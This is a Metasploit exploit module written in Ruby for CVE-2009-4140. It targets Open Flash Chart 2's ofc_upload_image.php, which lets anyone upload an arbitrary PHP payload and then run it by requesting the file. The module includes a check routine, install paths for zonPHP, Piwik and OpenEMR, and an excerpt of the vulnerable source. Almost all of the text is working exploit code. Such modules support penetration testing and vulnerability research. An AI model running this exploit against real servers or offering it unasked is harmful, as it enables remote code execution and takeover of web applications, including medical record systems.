Open Flash Chart 2 Arbitrary File Upload

##

# This module requires Metasploit: http//metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = GreatRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::FileDropper

def initialize(info={})

super(update_info(info,

'Name' => "Open Flash Chart v2 Arbitrary File Upload",

'Description' => %q{

This module exploits a file upload vulnerability found in Open Flash

Chart version 2. Attackers can abuse the 'ofc_upload_image.php' file

in order to upload and execute malicious PHP files.

},

'License' => MSF_LICENSE,

'Author' =>

[

'Braeden Thomas', # Initial discovery + Piwik PoC

'Gjoko Krstic <gjoko[at]zeroscience.mk>', # OpenEMR PoC

'Halim Cruzito', # zonPHP PoC

'Brendan Coles <bcoles[at]gmail.com>' # Metasploit

],

'References' =>

[

['BID', '37314'],

['CVE', '2009-4140'],

['OSVDB', '59051'],

['EDB', '10532']

],

'Payload' =>

{

'Space' => 8190, # Just a big value, injection on HTTP POST

'DisableNops' => true,

'BadChars' => "\x00"

},

'Arch' => ARCH_PHP,

'Platform' => 'php',

'Targets' =>

[

# Tested on:

# * open-flash-chart v2-Lug-Wyrm-Charmer

# set TARGETURI /php-ofc-library/

# * open-flash-chart v2-beta-1

# set TARGETURI /php-ofc-library/

# * zonPHP v2.25

# set TARGETURI /zonPHPv225/ofc/

# * Piwik v0.4.3

# set TARGETURI /piwik/libs/open-flash-chart/php-ofc-library/

# * OpenEMR v4.1.1

# set TARGETURI /openemr-4.1.1/library/openflashchart/php-ofc-library/

[ 'Generic (PHP Payload)', {} ]

],

'Privileged' => false,

'DisclosureDate' => 'Dec 14 2009',

'DefaultTarget' => 0))

register_options(

[

OptString.new('TARGETURI', [true, 'The base path to Open Flash Chart', '/php-ofc-library/'])

], self.class)

end

#

# Check for ofc_upload_image.php

#

def check

print_status("#{peer} - Sending check")

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(target_uri.path, "ofc_upload_image.php"),

})

if not res

print_error("#{peer} - Connection timed out")

return Exploit::CheckCode::Unknown

elsif res.code.to_i == 404

print_error("#{peer} - No ofc_upload_image.php found")

elsif res and res.code == 200 and res.body =~ /Saving your image to/

vprint_status("#{peer} - Found ofc_upload_image.php")

return Exploit::CheckCode::Detected

end

return Exploit::CheckCode::Safe

end

def exploit

# Upload

@fname = "#{rand_text_alphanumeric(rand(10)+6)}.php"

print_status("#{peer} - Uploading '#{@fname}' (#{payload.encoded.length} bytes)...")

res = send_request_cgi({

'method' => 'POST',

'uri' => normalize_uri(target_uri.path, 'ofc_upload_image.php'),

'ctype' => "",

'vars_get' => { 'name' => "#{@fname}" },

'data' => "<?php #{payload.encoded} ?>"

})

if not res

fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")

elsif res.code.to_i == 404

fail_with(Failure::NotFound, "#{peer} - No ofc_upload_image.php found")

elsif res.body =~ /can't write file/

fail_with(Failure::Unknown, "#{peer} - Unable to write '#{@fname}'")

elsif res.body =~ /Saving your image to: (.+)#{@fname}/

path = $1

register_files_for_cleanup(@fname)

print_status("#{peer} - Executing '#{path}#{@fname}'")

else

fail_with(Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!")

end

# Execute

res = send_request_raw({

'uri' => normalize_uri(target_uri.path, path, @fname)

})

if res and res.code == 404

fail_with(Failure::NotFound, "#{peer} - Not found: #{@fname}")

end

#

# Source

#

=begin ofc_upload_image.php

20-// default path for the image to be stored //

21-$default_path = '../tmp-upload-images/';

23-if (!file_exists($default_path)) mkdir($default_path, 0777, true);

25-// full path to the saved image including filename //

26-$destination = $default_path . basename( $_GET[ 'name' ] );

28-echo 'Saving your image to: '. $destination;

39-$jfh = fopen($destination, 'w') or die("can't open file");

40-fwrite($jfh, $HTTP_RAW_POST_DATA);

41-fclose($jfh);

=end